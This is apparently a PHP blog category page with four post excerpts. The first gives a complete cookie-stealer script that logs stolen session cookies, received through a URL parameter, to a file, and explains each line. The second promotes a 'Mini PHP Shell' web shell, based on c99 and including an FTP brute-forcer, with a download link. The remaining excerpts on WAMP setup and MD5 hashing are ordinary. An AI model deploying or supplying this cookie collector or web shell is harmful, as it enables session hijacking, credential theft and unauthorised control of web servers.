Here is the simple Cookie Stealer code:Cookie stored in File: <?php$cookie = $HTTP_GET_VARS[“cookie”];$steal = fopen(“cookiefile.txt”, “a”);fwrite($steal, $cookie .”\n”);fclose($steal);?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie […]
Category: PHP Programming
Mini PHP Shell 27.9 V2 Released
According to Developer jos_ali_joe and [Devilzc0de] “This is a continuation of PHP Shell Mini 27.9 V1 , Editing Shell c99 and new tools “.Features : Encoder , Processes , FTP-Brute-Forcer , Server-Information , SQL-Manager and etc.Download : http://www.mediafire.com/?cd6d29i7o9e0g2g
How to run php files using wamp server?
Let me explain today how to use the wamp server to run the PHP files. First of all download the Latest wamp server from here: http://www.wampserver.com/ and install the server. Step 2:Run wamp server by this selctionstart->All programs->Wamp server->Start wamp server Now you can see the w icon in system tray. Step 3: Create PHP […]
MD5 Hash Code for PHP Developers
Hi friends, This post is especially for PHP Developers. I hope you know about MD5. If you do not know,please read the following articles:Introduction to MD5 Hash CodeMD5 Hash code creation for Java Developers Like Java, php also have build in function named as “md5” for creating Hash code. how to use?Just pass the original […]